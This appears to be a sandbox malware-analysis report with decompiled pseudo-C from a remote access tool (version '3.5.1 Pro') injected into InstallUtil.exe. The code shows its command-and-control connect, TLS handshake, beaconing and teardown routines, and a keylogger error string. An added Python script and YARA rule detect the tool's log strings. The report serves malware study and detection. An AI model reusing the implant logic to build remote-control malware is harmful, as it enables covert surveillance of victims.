                                                                      				_t635 = 0x461084;
                                                                      				_t171 = E0040ECD0(_t734);
                                                                      				_t735 = _t171;
                                                                      				if(_t171 != 0) {
                                                                      					E00401E25(_t699, 0x461084, _t709, _t735, 0x3a);
                                                                      					_t373 = E0040243C();
                                                                      					_t375 = E00401F6B(E00401E25(_t699, 0x461084, _t709, _t735, 0x3a));
                                                                      					E00401E25(_t699, 0x461084, _t709, _t735, 0x39);
                                                                      					_t377 = E0040243C();
                                                                      					_t379 = E00401F6B(E00401E25(_t699, 0x461084, _t709, _t735, 0x39));
                                                                      					E00401E25(_t699, 0x461084, _t709, _t735, 0x38);
                                                                      					_t381 = E0040243C();
                                                                      					_t703 = _t381;
                                                                      					_t383 = E00401F6B(E00401E25(_t699, _t635, _t709, _t735, 0x38));
                                                                      					_t635 = _t381;
                                                                      					E004046FD(_t383, _t381, _t709, _t379, _t377, _t375, _t373);
                                                                      					_t713 = _t713 + 0x10;
                                                                      				}
                                                                      				L4:
                                                                      				_t714 = _t713 - 0x18;
                                                                      				 *0x46e881 = 1;
                                                                      				E00402053(_t387, _t714, _t635, _t709, 0x46722c);
                                                                      				_t173 = E00401E25( &_v76, _t635, _t709, _t735, _t387);
                                                                      				_t715 = _t714 - 0x18;
                                                                      				E004020B6(_t387, _t715, _t635, _t735, _t173);
                                                                      				E0041851D( &_v16, _t635);
                                                                      				_t716 = _t715 + 0x30;
                                                                      				_t176 = E00401E25( &_v16, _t635, _t709, _t735, 1);
                                                                      				E00401FA2(0x46e884, _t178, _t703, E00402ED0(_t387,  &_v40, E0040795C( &_v64, E00401E25( &_v16, _t635, _t709, _t735, 0), _t709, 0x46722c), _t709, _t735, _t176));
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				E00401E25( &_v16, _t178, _t709, _t735, 2);
                                                                      				_t638 = "0";
                                                                      				_t184 = E00405ADC("0");
                                                                      				_t415 =  &_v100;
                                                                      				_t736 = _t184;
                                                                      				if(_t184 == 0) {
                                                                      					 *0x46dad4 = 1;
                                                                      					_push("TLS On ");
                                                                      				} else {
                                                                      					 *0x46dad4 = 0;
                                                                      					_push("TLS Off");
                                                                      				}
                                                                      				L00405A7D(_t387, _t415, _t638);
                                                                      				_t717 = _t716 - 0x18;
                                                                      				E00402ED0(_t387, _t717, E0040793B(_t387,  &_v40, E004052F5( &_v64, "Connecting  | ", _t709,  &_v100), _t699, _t709, _t736, " | "), _t709, _t736, 0x46e884);
                                                                      				_t718 = _t717 - 0x14;
                                                                      				E00402053(_t387, _t718, _t188, _t709, "i");
                                                                      				E00417D02(_t387, _t699);
                                                                      				_t713 = _t718 + 0x30;
                                                                      				E00401F98();
                                                                      				E00401F98();
                                                                      				_t195 = E00401F6B(E00401E25( &_v16, _t188, _t709, _t736, 1));
                                                                      				_t197 = E00401F6B(E00401E25( &_v16, _t188, _t709, _t736, 0));
                                                                      				_t635 = _t195;
                                                                      				_t198 = E004124C2(_t197, _t195,  &_v64,  &_v64);
                                                                      				_t737 = _t198;
                                                                      				if(_t198 == 0) {
                                                                      					_t703 = 0x46e850;
                                                                      					_t199 = E00404804(0x46e850);
                                                                      					__eflags = _t199;
                                                                      					if(_t199 != 0) {
                                                                      						E00404F28(0x46e850, 0x3c, 0); // executed
                                                                      						_t201 = E0040489F(0x46e850, 0x46e850, 0x46e850); // executed
                                                                      						__eflags = _t201;
                                                                      						if(__eflags != 0) {
                                                                      							_t209 = E00401E25( &_v16, _t635, _t709, __eflags, 1);
                                                                      							_t719 = _t713 - 0x18;
                                                                      							_t210 = E00401E25( &_v16, _t635, _t709, __eflags, 0);
                                                                      							_t646 = E0040793B(_t387,  &_v64, E00402ED0(_t387,  &_v184, E0040793B(_t387,  &_v208, E004052F5( &_v232, "Connected   | ", _t709,  &_v100), _t699, _t709, __eflags, " | "), _t709, __eflags, _t210), _t699, _t709, __eflags, 0x46722c);
                                                                      							E00402ED0(_t387, _t719, _t646, _t709, __eflags, _t209);
                                                                      							_t720 = _t719 - 0x14;
                                                                      							E00402053(_t387, _t720, _t646, _t709, "i");
                                                                      							E00417D02(_t387, _t699);
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							_v136 = 0;
                                                                      							asm("stosd");
                                                                      							asm("stosd");
                                                                      							asm("stosd");
                                                                      							asm("stosd");
                                                                      							asm("stosd");
                                                                      							_t224 = E00417F7C( &_v232);
                                                                      							_push(_t646);
                                                                      							E00411B96( &_v136, "%I64u", _t224);
                                                                      							E0040773A(_t387,  &_v40, _t646, __eflags, 0x46e408);
                                                                      							E0043DDD1( &_v40,  *0x46c9c0,  &_v112, 0xa);
                                                                      							E004020B6(_t387,  &_v160, _t646, __eflags, E00401E25(0x46e600, _t646, _t709, __eflags, 1));
                                                                      							_t232 = E0040243C();
                                                                      							_t233 = E00401F6B(0x46e5e8);
                                                                      							_t647 = E00401F6B(0x46e5a0);
                                                                      							_t236 = E00410C6B(_t235, "name",  &_v2436, 0x104, _t233, _t232);
                                                                      							_t724 = _t720 + 0x60;
                                                                      							__eflags = _t236;
                                                                      							if(_t236 != 0) {
                                                                      								L00405A7D(_t387,  &_v160, _t647,  &_v2436);
                                                                      							}
                                                                      							_t237 =  *0x46dd3c; // 0x0
                                                                      							_t701 = 0;
                                                                      							__eflags = _t237;
                                                                      							if(_t237 != 0) {
                                                                      								_t701 =  *_t237() & 0x0000ffff;
                                                                      							}
                                                                      							E0040413E(_t387,  &_v64, _t647, _t709, "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe");
                                                                      							_t725 = _t724 - 0x18;
                                                                      							_t240 = E00418445(_t387,  &_v1408, 0x46e588);
                                                                      							_t241 = E004182D1(_t387,  &_v1384, _t701 & 0x0000ffff);
                                                                      							_t242 = E00401E25( &_v16, _t701 & 0x0000ffff, _t709, __eflags, 0);
                                                                      							_t245 = E004182D1(_t387,  &_v1360, GetTickCount());
                                                                      							_t247 = E004182D1(_t387,  &_v1336, E00418281( &_v1360));
                                                                      							_t250 = E00418445(_t387,  &_v1288, E00418232(_t387,  &_v1312));
                                                                      							_t251 = E00418445(_t387,  &_v1264, 0x46e0d8);
                                                                      							_t252 = E00418445(_t387,  &_v1240,  &_v64);
                                                                      							_t253 = E00418445(_t387,  &_v1216,  &_v40);
                                                                      							_t255 = E00418445(_t387,  &_v1192, 0x46e968);
                                                                      							_t256 = E0040D39C( &_v1168);
                                                                      							_t257 = E00418445(_t387,  &_v1144, 0x46e60c);
                                                                      							_t635 = E00402ED0(_t387,  &_v232, E00402ED0(_t387,  &_v208, E00402ED0(_t387,  &_v184, E00402E61( &_v280, E00402ED0(_t387,  &_v304, E00402E61( &_v328, E00402ED0(_t387,  &_v352, E00402ED0(_t387,  &_v376, E00402ED0(_t387,  &_v400, E00402ED0(_t387,  &_v424, E00402ED0(_t387,  &_v448, E0040793B(_t387,  &_v472, E00402ED0(_t387,  &_v496, E00402E61( &_v520, E00402ED0(_t387,  &_v544, E00402E61( &_v568, E00402ED0(_t387,  &_v592, E0040799E(_t387,  &_v616, E00402ED0(_t387,  &_v640, E00402E61( &_v664, E00402ED0(_t387,  &_v688, E00402E61( &_v712, E00402ED0(_t387,  &_v736, E00402E61( &_v760, E00402ED0(_t387,  &_v784, E00402E61( &_v808, E00402ED0(_t387,  &_v832, E0040793B(_t387,  &_v856, E00402ED0(_t387,  &_v880, E0040793B(_t387,  &_v904, E00402ED0(_t387,  &_v928, E00402E61( &_v952, E00402ED0(_t387,  &_v976, E00402ED0(_t387,  &_v1000, E00402ED0(_t387,  &_v1024, E00402E61( &_v1048, E00402ED0(_t387,  &_v1072, E00402E61( &_v1096, E00402EF1( &_v1120,  &_v160, _t709, 0x46e260), _t257), _t709, __eflags, 0x46e260), _t256), _t709, __eflags, 0x46e260), _t709, __eflags, 0x46e63c), _t709, __eflags, 0x46e260), _t255), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags,  &_v136), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags, "3.5.1 Pro"), _t709, __eflags, 0x46e260), _t253), _t709, __eflags, 0x46e260), _t252), _t709, __eflags, 0x46e260), _t251), _t709, __eflags, 0x46e260), _t250), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags,  *0x46c9c4 & 0x000000ff), _t709, __eflags, 0x46e260), _t247), _t709, __eflags, 0x46e260), _t245), _t709, __eflags, 0x46e260), 0x46e260, _t709, __eflags,  &_v112), _t709, __eflags, 0x46e260), _t709, __eflags, _t242), _t709, __eflags, 0x46e260), _t709, __eflags, 0x46e5d0), _t709, __eflags, 0x46e260), _t241), _t709, __eflags, 0x46e260), _t240), _t709, __eflags, 0x46e260), _t709, __eflags,  &_v256), _t709, __eflags, 0x46e260);
                                                                      							E00402ED0(_t387, _t725, _t296, _t709, __eflags, "Exe");
                                                                      							_t703 = 0x46e850;
                                                                      							_push(0x4b);
                                                                      							E00404A78(0x46e850, _t296, __eflags);
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401EC9();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401F98();
                                                                      							E00401EC9();
                                                                      							E00404BE7(0x46e850, _t296, 0x412ff8, 1);
                                                                      							_t352 =  *0x46dd40; // 0x0
                                                                      							__eflags = _t352;
                                                                      							if(_t352 != 0) {
                                                                      								__eflags =  *0x46dd02;
                                                                      								if( *0x46dd02 != 0) {
                                                                      									_t352 =  *_t352();
                                                                      									 *0x46dd02 = 0;
                                                                      								}
                                                                      							}
                                                                      							__eflags =  *0x46e3f2;
                                                                      							if( *0x46e3f2 != 0) {
                                                                      								_t352 = E004096DC(_t387, 0x46e3a8, _t635);
                                                                      							}
                                                                      							E00405A42(_t352);
                                                                      							_t726 = _t725 - 0x18;
                                                                      							E00402053(_t387, _t726, _t635, _t709, "Disconnected");
                                                                      							_t727 = _t726 - 0x18;
                                                                      							E00402053(_t387, _t727, _t635, _t709, "!");
                                                                      							E00417D02(_t387, 0x46e260);
                                                                      							_t713 = _t727 + 0x30;
                                                                      							__eflags =  *0x46de98;
                                                                      							if( *0x46de98 != 0) {
                                                                      								__eflags = 0;
                                                                      								CreateThread(0, 0, E00417595, 0, 0, 0);
                                                                      							}
                                                                      							E00401F98();
                                                                      							E00401EC9();
                                                                      							_t699 = 0x46e600;
                                                                      						}
                                                                      					} else {
                                                                      						_t728 = _t713 - 0x18;
                                                                      						E00402053(_t387, _t728, _t635, _t709, "Connection Error: Unable to create socket");
                                                                      						_t729 = _t728 - 0x18;
                                                                      						E00402053(_t387, _t729, _t635, _t709, "E");
                                                                      						E00417D02(_t387, _t699);
                                                                      						_t713 = _t729 + 0x30;
                                                                      					}
                                                                      				} else {
                                                                      					__imp__#111();
                                                                      					_t367 = E0041925A( &_v40, _t198); // executed
                                                                      					_t730 = _t713 - 0x18;
                                                                      					_t635 = "Connection Error: ";
                                                                      					E004052D4(_t387, _t730, "Connection Error: ", _t709, _t737, _t367);
                                                                      					_t731 = _t730 - 0x14;
                                                                      					E00402053(_t387, _t731, "Connection Error: ", _t709, "E");
                                                                      					E00417D02(_t387, _t699);
                                                                      					_t713 = _t731 + 0x30;
                                                                      					E00401F98();
                                                                      					_t703 = 0x46e850;
                                                                      				}
                                                                      				E00404DFD(_t635);
                                                                      				_t387 =  &(_t387->nLength);
                                                                      				_t203 = E004021BA( &_v76);
                                                                      				_t738 = _t387 - _t203;
                                                                      				if(_t387 >= _t203) {
                                                                      					_t387 = 0;
                                                                      					_t208 = E004383EC(_t205, E00401F6B(E00401E25(_t699, _t635, _t709, _t738, 2))) * 0x3e8;
                                                                      					_t735 = _t208;
                                                                      					Sleep(_t208); // executed
                                                                      				}
                                                                      				E00401E4D( &_v16, _t635);
                                                                      				goto L4;
                                                                      			}

                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000,00000029,76EC43E0,0046E600,00000000), ref: 00412554
                                                                      • WSAGetLastError.WS2_32(00000000,00000001), ref: 00412765
                                                                      • Sleep.KERNELBASE(00000000,00000002), ref: 00412FE5
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep$ErrorLastLocalTime
                                                                      • String ID: | $%I64u$3.5.1 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$TLS Off$TLS On $name$Cv
                                                                      • API String ID: 524882891-3186453305
                                                                      • Opcode ID: c21f36a0ff83c0d172256f3d5d64dbbaee89fb63f94fa55c32b6ef31a1cc3040
                                                                      • Instruction ID: dd2691d483a93dc2e8991264f89b2e80d2ae936469f5f19057ec07884e741be9
                                                                      • Opcode Fuzzy Hash: c21f36a0ff83c0d172256f3d5d64dbbaee89fb63f94fa55c32b6ef31a1cc3040
                                                                      • Instruction Fuzzy Hash: 32428F31A001195ACB18F732DD66AEE73759F51308F5040BFB40AB61E2EF781E868A9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 73%
                                                                      			E0040489F(void* __ecx, void* __esi) {
                                                                      				char _v32;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				intOrPtr _t21;
                                                                      				int _t22;
                                                                      				void* _t26;
                                                                      				signed int _t31;
                                                                      				void* _t32;
                                                                      				void* _t33;
                                                                      				struct _SECURITY_ATTRIBUTES* _t34;
                                                                      				void* _t42;
                                                                      				void* _t43;
                                                                      				void* _t51;
                                                                      				struct _SECURITY_ATTRIBUTES* _t56;
                                                                      				void* _t58;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      				void* _t84;
                                                                      				void* _t85;
                                                                      				void* _t86;
                                                                      				void* _t87;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      
                                                                      				_t84 = __esi;
                                                                      				_t21 =  *0x46dacc; // 0x0
                                                                      				_t87 = _t86 - 0x1c;
                                                                      				_t82 = __ecx;
                                                                      				_t3 = _t82 + 4; // 0xffffffff, executed
                                                                      				__imp__#4( *_t3,  *((intOrPtr*)(_t21 + 0x18)),  *((intOrPtr*)(_t21 + 0x10)), _t81, _t51); // executed
                                                                      				if(_t21 != 0) {
                                                                      					__eflags =  *((char*)(__ecx + 0x31));
                                                                      					if( *((char*)(__ecx + 0x31)) != 0) {
                                                                      						__imp__#111();
                                                                      						_t56 = _t21 - 0x2736;
                                                                      						__eflags = _t56;
                                                                      						if(_t56 != 0) {
                                                                      							__eflags = _t56 == 0x17;
                                                                      							if(_t56 == 0x17) {
                                                                      								_t88 = _t87 - 0x18;
                                                                      								_t58 = _t87 - 0x18;
                                                                      								_push("Connection Refused");
                                                                      								goto L20;
                                                                      							} else {
                                                                      								_t26 = E0041925A( &_v32, _t21);
                                                                      								_t91 = _t87 - 0x18;
                                                                      								E004052D4(_t51, _t87 - 0x18, "Connection Failed: ", _t85, __eflags, _t26);
                                                                      								E00402053(_t51, _t91 - 0x14, "Connection Failed: ", _t85, "E");
                                                                      								E00417D02(_t51, _t82);
                                                                      								E00401F98();
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					goto L21;
                                                                      				} else {
                                                                      					if( *((intOrPtr*)(__ecx + 1)) == _t21) {
                                                                      						L14:
                                                                      						_t22 = 1;
                                                                      					} else {
                                                                      						if( *((intOrPtr*)(__ecx + 0x31)) != _t21) {
                                                                      							_t103 = _t87 - 0x18;
                                                                      							_t6 = _t82 + 0x34; // 0x46e2ac
                                                                      							_t77 = "TLS Handshake...      | ";
                                                                      							E004052F5(_t103, "TLS Handshake...      | ", _t85, _t6);
                                                                      							_t104 = _t103 - 0x14;
                                                                      							E00402053(_t51, _t104, "TLS Handshake...      | ", _t85, "i");
                                                                      							E00417D02(_t51, _t82);
                                                                      							_t87 = _t104 + 0x30;
                                                                      						}
                                                                      						_t31 = E0041D7D4(_t51);
                                                                      						 *(_t82 + 0x4c) = _t31;
                                                                      						if(_t31 != 0) {
                                                                      							_t8 = _t82 + 4; // 0xffffffff
                                                                      							_t80 =  *_t8;
                                                                      							_t32 = E0041DA03(_t31,  *_t8);
                                                                      							__eflags = _t32 - 1;
                                                                      							if(_t32 == 1) {
                                                                      								_t33 = E0041E5FE();
                                                                      								__eflags = _t33 - 1;
                                                                      								if(_t33 == 1) {
                                                                      									_t34 = E0041D97A(_t51);
                                                                      									 *((intOrPtr*)(_t82 + 0x50)) = _t34;
                                                                      									__eflags = _t34;
                                                                      									if(_t34 == 0) {
                                                                      										_t94 = _t87 - 0x18;
                                                                      										E00402053(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 3");
                                                                      										E00402053(_t51, _t94 - 0x18, _t80, _t85, "E");
                                                                      										E00417D02(_t51, _t82);
                                                                      									}
                                                                      									__eflags = 0;
									 *((intOrPtr*)(_t82 + 0x70)) = CreateEventW(0, 0, 1, 0); // auto-reset event, initially signalled (bManualReset=0, bInitialState=1)
									 *((intOrPtr*)(_t82 + 0x6c)) = CreateEventW(0, 0, 1, 0); // second auto-reset event; both are waited on and closed by the shutdown routine E00404DFD below
                                                                      									goto L14;
                                                                      								} else {
                                                                      									_t97 = _t87 - 0x18;
                                                                      									E00402053(_t51, _t87 - 0x18, _t80, _t85, "TLS Authentication Failed");
                                                                      									E00402053(_t51, _t97 - 0x18, _t80, _t85, "E");
                                                                      									_t42 = E00417D02(_t51, _t82);
                                                                      									_t13 = _t82 + 0x4c; // 0x0
                                                                      									_t43 = E0041DC26(_t42,  *_t13);
                                                                      									goto L8;
                                                                      								}
                                                                      							} else {
                                                                      								_t100 = _t87 - 0x18;
                                                                      								E00402053(_t51, _t87 - 0x18, _t80, _t85, "TLS Error 2");
                                                                      								E00402053(_t51, _t100 - 0x18, _t80, _t85, "E");
                                                                      								_t43 = E00417D02(_t51, _t82);
                                                                      								L8:
								_t9 = _t82 + 0x4c; // 0x0
								E0041D814(_t43, _t51,  *_t9, _t80, _t82, _t84); // shared error path (TLS Error 2 / TLS Authentication Failed): release the TLS object at +0x4c
								 *(_t82 + 0x4c) =  *(_t82 + 0x4c) & 0x00000000; // and clear the field so the shutdown routine does not free it twice
                                                                      								goto L21;
                                                                      							}
                                                                      						} else {
                                                                      							_t88 = _t87 - 0x18;
                                                                      							_t58 = _t87 - 0x18;
                                                                      							_push("TLS Error 1");
                                                                      							L20:
                                                                      							E00402053(_t51, _t58, _t77, _t85);
                                                                      							E00402053(_t51, _t88 - 0x18, _t77, _t85, "E");
                                                                      							E00417D02(_t51, _t82);
                                                                      							L21:
                                                                      							_t22 = 0;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return _t22;
			}

                                                                      Address column for the listing above: 0x0040489f .. 0x00404a75 (one address per decompiled line, 0x00000000 for the goto lines)

                                                                      APIs
                                                                      • connect.WS2_32(FFFFFFFF,?,?), ref: 004048B7
                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8,00000000), ref: 004049D7
                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8,00000000), ref: 004049E5
                                                                      • WSAGetLastError.WS2_32(?,004052E2,?,Keylogger initialization failure: error ,?,00408AC8,00000000), ref: 004049F8
                                                                        • Part of subcall function 00417D02: GetLocalTime.KERNEL32(00000000), ref: 00417D1C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $R@
                                                                      • API String ID: 994465650-3185988060
                                                                      • Opcode ID: 63342f0192dee1e784b5ec474e351367c7b5c33f2b130e557f670a94ef39ff7e
                                                                      • Instruction ID: 707485a4b14cc15d26f85242ace4de7c6ed769eeea86a0797bc035552a01cbba
                                                                      • Opcode Fuzzy Hash: 63342f0192dee1e784b5ec474e351367c7b5c33f2b130e557f670a94ef39ff7e
                                                                      • Instruction Fuzzy Hash: B44127F1B0021667CB14777A9A0B56F7A21AB82348B40417FF601576D2EBBEA811C7DF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
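The connect routine above passes a fixed set of state strings (the String ID list: "Connection Failed: ", "Connection Refused", "TLS Handshake...      | ", "TLS Error 1/2/3", "TLS Authentication Failed", plus the "Keylogger initialization failure: error " text visible on the stack) to the log writer E00402053. The script below is an added example, not Joe Sandbox output and not code from the sample: it scans a raw memory dump such as the 0x00400000 region this listing was decompiled from for those strings in both narrow and UTF-16LE form, reports their offsets, and emits an equivalent YARA rule. The sample buffer is constructed inline, and the threshold of four distinct strings is an assumption chosen so that generic text like "Connection Refused" does not match on its own.

```python
"""Locate the Remcos connection-state log strings from the listing above in a
raw memory dump and emit an equivalent YARA rule.

Added example: not Joe Sandbox output and not code from the sample. The
needles are the String IDs of the decompiled connect routine; SAMPLE_DUMP is
constructed here so the script runs offline, and the four-string threshold is
an assumption, not a value taken from the report.
"""
import re
import sys

# Byte-exact copies of the strings the connect routine hands to the log
# writer (E00402053), including the trailing spaces some of them carry.
REMCOS_CONN_STRINGS = [
    b"Connection Failed: ",
    b"Connection Refused",
    b"TLS Handshake...      | ",
    b"TLS Error 1",
    b"TLS Error 2",
    b"TLS Error 3",
    b"TLS Authentication Failed",
    b"Keylogger initialization failure: error ",
]


def find_strings(buf: bytes, needles=REMCOS_CONN_STRINGS) -> dict:
    """Return {string: sorted offsets} for each needle present in buf.

    Both the narrow form and the UTF-16LE ("wide") form are searched, since a
    dump may hold either depending on which API the string was built for.
    """
    hits = {}
    for narrow in needles:
        wide = narrow.decode("ascii").encode("utf-16-le")
        offs = [m.start() for m in re.finditer(re.escape(narrow), buf)]
        offs += [m.start() for m in re.finditer(re.escape(wide), buf)]
        if offs:
            hits[narrow.decode("ascii")] = sorted(offs)
    return hits


def is_suspicious(hits: dict, threshold: int = 4) -> bool:
    """Flag a buffer once at least `threshold` distinct strings are present."""
    return len(hits) >= threshold


def yara_rule(name: str = "remcos_conn_log_strings", threshold: int = 4) -> str:
    """Render the same check as a YARA rule matching ascii and wide forms."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(REMCOS_CONN_STRINGS):
        lines.append(f'        $s{i} = "{s.decode("ascii")}" ascii wide')
    lines += ["    condition:", f"        {threshold} of ($s*)", "}"]
    return "\n".join(lines)


# Constructed test buffer: four of the strings, one of them in UTF-16LE,
# NUL-terminated and padded the way they sit in a data section.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"Connection Failed: \x00"
    + b"TLS Handshake...      | \x00"
    + "TLS Error 2".encode("utf-16-le") + b"\x00\x00"
    + b"TLS Authentication Failed\x00"
    + b"\x00" * 16
)


def scan_file(path: str) -> dict:
    """Scan a memory dump or unpacked PE on disk and return the hits."""
    with open(path, "rb") as fh:
        return find_strings(fh.read())


if __name__ == "__main__":
    data = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_strings(SAMPLE_DUMP)
    for s, offs in data.items():
        print(f"{s!r}: {', '.join(hex(o) for o in offs)}")
    print("suspicious" if is_suspicious(data) else "not enough strings")
    print(yara_rule())
```

Run it with the path of a process memory dump as the only argument; without an argument it scans the constructed buffer. Searching the wide form as well matters because the same build may format some messages for the W-variant APIs, and a rule that only covers the ANSI bytes would miss them.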

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 92%
                                                                      			E00404DFD(void* __edx) {
                                                                      				void* __ebx;
                                                                      				void* __ecx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				long _t29;
                                                                      				int _t32;
                                                                      				long _t33;
                                                                      				long _t36;
                                                                      				void* _t44;
                                                                      				void* _t48;
                                                                      				void* _t50;
                                                                      				void* _t51;
                                                                      
                                                                      				_t48 = __edx;
                                                                      				_t51 = WaitForSingleObject;
                                                                      				_t50 = _t44;
				_t1 = _t50 + 0x68; // 0x0
				_t29 = WaitForSingleObject( *_t1, 0xffffffff); // block (INFINITE) on the event at +0x68 before tearing the connection down
                                                                      				if( *(_t50 + 4) != 0xffffffff) {
					_t5 = _t50 + 4; // 0xffffffff, executed
					__imp__#3( *_t5); // executed; WS2_32 ordinal #3 is closesocket (see APIs below): close the socket held at +4
                                                                      					if(_t29 == 0) {
                                                                      						 *(_t50 + 4) =  *(_t50 + 4) | 0xffffffff;
                                                                      					}
                                                                      					_t45 = _t50;
                                                                      					if(E004046B3(_t50) != 0) {
                                                                      						E004050BB(_t45, _t51, 1);
                                                                      					}
					if( *((char*)(_t50 + 1)) != 0) { // TLS flag at +1, the same byte the connect routine above tests
                                                                      						_t9 = _t50 + 0x70; // 0x0
                                                                      						_t33 = WaitForSingleObject( *_t9, 0xffffffff);
                                                                      						_t10 = _t50 + 0x50; // 0x0
						E0041D814(_t33, CloseHandle,  *_t10, _t48, SetEvent, _t50); // release the TLS object at +0x50; CloseHandle/SetEvent here are the decompiler's guesses for register-passed arguments
                                                                      						_t11 = _t50 + 0x70; // 0x0
                                                                      						 *(_t50 + 0x50) =  *(_t50 + 0x50) & 0x00000000;
                                                                      						SetEvent( *_t11);
                                                                      						_t14 = _t50 + 0x6c; // 0x0
                                                                      						_t36 = WaitForSingleObject( *_t14, 0xffffffff);
                                                                      						_t15 = _t50 + 0x4c; // 0x0
                                                                      						E0041D814(_t36, CloseHandle,  *_t15, _t48, SetEvent, _t50);
                                                                      						_t16 = _t50 + 0x6c; // 0x0
                                                                      						 *(_t50 + 0x4c) =  *(_t50 + 0x4c) & 0x00000000;
                                                                      						SetEvent( *_t16);
                                                                      						_t19 = _t50 + 0x70; // 0x0
                                                                      						CloseHandle( *_t19);
                                                                      						_t20 = _t50 + 0x6c; // 0x0
                                                                      						CloseHandle( *_t20);
                                                                      						 *(_t50 + 0x70) =  *(_t50 + 0x70) & 0x00000000;
                                                                      						 *(_t50 + 0x6c) =  *(_t50 + 0x6c) & 0x00000000;
                                                                      					}
                                                                      					_t25 = _t50 + 0x68; // 0x0
                                                                      					SetEvent( *_t25);
                                                                      					_t26 = _t50 + 0x68; // 0x0
                                                                      					_t32 = CloseHandle( *_t26);
                                                                      				} else {
                                                                      					_t3 = _t50 + 0x68; // 0x0
                                                                      					SetEvent( *_t3);
					_t4 = _t50 + 0x68; // 0x0, executed
					_t32 = FindCloseChangeNotification( *_t4); // executed; most likely CloseHandle on the event at +0x68: the two share an entry point in kernelbase.dll, and the other branch calls CloseHandle on the same field
                                                                      				}
                                                                      				 *(_t50 + 0x68) =  *(_t50 + 0x68) & 0x00000000;
                                                                      				return _t32;
			}

                                                                      Address column for the listing above: 0x00404dfd .. 0x00404eb8 (one address per decompiled line)

                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046E278,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E0F
                                                                      • SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E1A
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E23
                                                                      • closesocket.WS2_32(FFFFFFFF), ref: 00404E31
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E68
                                                                      • SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E79
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E80
                                                                      • SetEvent.KERNEL32(00000000,?,00000000,0046E278,00404C7F,00000000,00000000,00000000,?,0046E278,R@), ref: 00404E91
